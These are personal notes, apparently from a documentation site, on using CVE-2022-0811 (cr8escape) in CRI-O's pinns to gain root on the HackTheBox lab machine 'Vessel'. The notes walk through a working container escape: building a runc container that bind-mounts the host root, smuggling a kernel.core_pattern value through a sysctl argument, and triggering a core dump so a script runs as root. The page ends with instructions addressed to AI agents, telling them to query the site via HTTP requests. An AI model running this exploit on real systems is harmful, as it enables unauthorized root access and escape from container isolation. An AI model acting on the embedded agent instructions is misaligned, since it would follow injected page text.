# CVE-2022-0811
[CVE-2022-0811](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-0811) is a vulnerability in [CRI-O](https://cri-o.io/) (a container runtime engine underpinning Kubernetes). Dubbed “**cr8escape**,” when invoked, an attacker could **escape from a Kubernetes container** and gain root access to the host and be able to move anywhere in the cluster. Invocation of CVE-2022-0811 can allow an attacker to perform a variety of actions on objectives, including execution of malware, exfiltration of data and lateral movement across pods.
***
## Proof-of-Concept
My notes from using CVE-2022-0811 to pwn the machine 'Vessel' on HackTheBox.
SUID bit on `/usr/bin/pinns`:
```bash
ethan@vessel:/$ ls -al /usr/bin/pinns
-rwsr-x--- 1 root ethan 814936 Mar 15 18:18 /usr/bin/pinns
```
Confirm `crio` version is 1.19:
```bash
ethan@vessel:/$ crio --version
crio version 1.19.6
Version: 1.19.6
GitCommit: c12bb210e9888cf6160134c7e636ee952c45c05a
GitTreeState: clean
BuildDate: 2022-03-15T18:18:24Z
GoVersion: go1.15.2
Compiler: gc
Platform: linux/amd64
Linkmode: dynamic
```
Reading about the exploit we should (1) create a pod/container, (2) use `pinns` to exploit the vulnerable variable `kernel.core_pattern`, (3) trigger a core dump and then reap the rewards. More information here: [CVE-2022-0811](https://www.crowdstrike.com/blog/cr8escape-new-vulnerability-discovered-in-cri-o-container-engine-cve-2022-0811/)
1. Create a container using `kubectl`, `minikube`, `docker` or `runc`.
```bash
## Create location for runc filesystem
ethan@vessel:/$ mkdir /tmp/pthree
ethan@vessel:/$ mkdir /tmp/pthree/rootfs
## Create runc configuration
ethan@vessel:/tmp/pthree$ runc spec --rootless
## Add following data under 'mounts' section of config.json
{
"type": "bind",
"source": "/",
"destination": "/",
"options": [
"rbind",
"rw",
"rprivate"
]
},
## Start runc
ethan@vessel:/tmp/pthree$ runc run privesc
root@runc:/# hostname
runc
```
2. Open a second terminal and write a simple PoC script to be executed
```bash
ethan@vessel:/tmp$ cat poc
#!/bin/sh
whoami && hostname >> /tmp/out
```
From the same terminal, run the malicious `pinns` command:
```bash
ethan@vessel:/tmp$ /usr/bin/pinns -d /tmp/pthree -f privesc -s 'kernel.shm_rmid_forced=1+kernel.core_pattern=|/tmp/poc #'--ipc --net --uts
```
Verify that `netns` and `utsns` are created in `/tmp/pthree` from the container:
```bash
# ls -al /tmp/pthree
total 24
drwxrwxr-x 5 root root 4096 Sep 2 09:07 .
drwxrwxrwt 17 nobody nogroup 4096 Sep 2 09:03 ..
-rw-rw-r-- 1 root root 2893 Sep 2 08:59 config.json
drwxr-xr-x 2 nobody root 4096 Sep 2 09:07 netns
drwxrwxr-x 2 root root 4096 Sep 2 08:58 rootfs
drwxr-xr-x 2 nobody root 4096 Sep 2 09:07 utsns
```
3. In the first terminal (runc container) trigger a core dump to run the script:
```bash
root@runc:/# ulimit -c unlimited
root@runc:/# tail -f /dev/null &
[1] 32
root@runc:/# kill -SIGSEGV 32
root@runc:/# ps
PID TTY TIME CMD
1 pts/0 00:00:00 sh
18 pts/0 00:00:00 bash
33 pts/0 00:00:00 ps
[1]+ Segmentation fault (core dumped) tail -f /dev/null
```
4. Verify in the second terminal that the script was executed
```bash
ethan@vessel:/tmp/pthree$ cat /tmp/out
root
vessel
```
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://0xpthree.gitbook.io/notes/exploits-pocs/runc/cve-2022-0811.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.